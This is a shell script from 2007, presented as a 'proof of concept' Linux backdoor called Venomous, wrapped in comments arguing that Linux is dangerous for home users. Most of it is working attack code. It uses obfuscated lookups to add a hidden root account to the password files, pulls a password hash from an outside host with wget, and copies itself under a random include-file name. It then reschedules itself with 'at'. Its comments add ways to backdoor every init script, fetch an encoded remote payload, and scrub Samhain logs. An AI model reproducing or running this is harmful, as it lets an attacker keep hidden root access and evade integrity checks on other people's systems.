# !/bin/sh # Venomous # Linux PoC backdoor keeper... # http://www.infiltrated.net/ubuntuDestruction.php # J. Oquendo (c) 05/09/2007 # Analogy... # Grandma needs a gun to go hunting for rabbits. She buys herself a # functional .22 (Windows *Anything*) in order to get food. Another # hunter who sees her offers her a bazooka (Anything *Nix) in order # for her get food. Oh the mess she will make. She doesn't need it # as her .22 will function just fine and certainly using the bazooka # will make a mess for one and she won't understand the power the # bazooka has until its too late. The hunter who gave her the bazooka? # They did it out of a good heart thinking if they gave her a bigger # gun, she would surely get something... They never took the time to # look at a bigger picture: "If I give this woman the bazooka, she # *really* isn't capable of handling it and will likely cause an # accident..." # If you have to ask you shouldn't run this password for venomous # is password happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h` days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h` guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'` sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'` who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'` echo "Enter your email address" ; read ans ; where=$ans $who | $what $where # Ugly method too keep a rootaccount Follows... For those not in the know... # Venomous was an idea made to prove a point, not give script kiddiots another # tool to be morons with. Instead of ruining things, how about solving... # Instead of naysaying... Prove me wrong # Pick a ranDumb file in /usr/includes/ then create the same backdoor on the # system using this filename. Do something sneaky on your own to place this # file on a startup I could show you, but then I would have to kill -9 you # Note the location... Highly doubtable to remove an actual include file # unless some stupid admin did something really dumb... Before someone mouths # around via e-mail... I could have written this all inclusively but I chose # not to for obvious reasons... random=`date|awk -F : '{print $3}'|awk '{print $1}'` echo $random > /tmp/secCommand sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'` filename=`echo $sad|sh|awk -F . '{print $1}'` rm /tmp/secCommand # Rinse and repeat 30 days from now... at now + 30 days $filename # Stupidities # Wanna backdoor every startup script? Try something like who knows... # chmod +x $filename # echo "perl -pi -e 's/Starting \$prog: \"/Starting \$prog: \" $filename/g' /etc/init.d/*"|sh # Pseudocrypted... # wget -qO - www.infiltrated.net/scripts/venomous|\ # python -c "import sys; print sys.stdin.read().encode('base64')" > $filename # Add your own decode shit after this line # Wanna hide your entries in Samhain? # and uncomment the line below # awk -vfilename=$filename '{print "perl -pi -e '\''s/'$filename'/samhain/g'\''"}' /var/log/samhain_log|sh # Step by step # random=`date|awk -F : '{print $3}'|awk '{print $1}'` # Get the second # echo $random > /tmp/secCommand # Store that number temporarily # sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'` # Print out the file based on that number. ls will show a list of file, what # follows will number the lines and pull out the number stored in the # temporary file. # rm /tmp/secCommand # Remove the temporary number # filename=`echo $sad|sh|awk -F . '{print $1}'` # duplicate the file from the commands above... # Now of course I could have modified this to replicate any one of the files # on startup but again... PoC ... The naysayers will ramble on about "You're # out of your mind..." Am I? I've given you the PoC's what more do you want... # Ubuntu or any Linux for the lowly home user is a horrible idea... # And AGAIN before someone fires off "I would see the URL and that's a dead # giveaway!" ... Look, I'm trying to make a point here... I "could have" # a functioning backdoor undetectable to most integrity checkers, Samhain, # Tripwire etc., but why should I disclose this anywhere. It's not in the # best interest of anyone to do so... Don't bother asking for it via email # because it's not public and will never be... # This again... Was to prove a point to the naysayers who this shit doesn't # happen... Keep dreaming. Its only a matter of time before you guys go # Goo Goo about getting Linux for Idjits off the ground, but its a horrible # mistake in the making # For those stating "I don't run as root you loser boo hoo..." Get a grip # ever hear of escalation...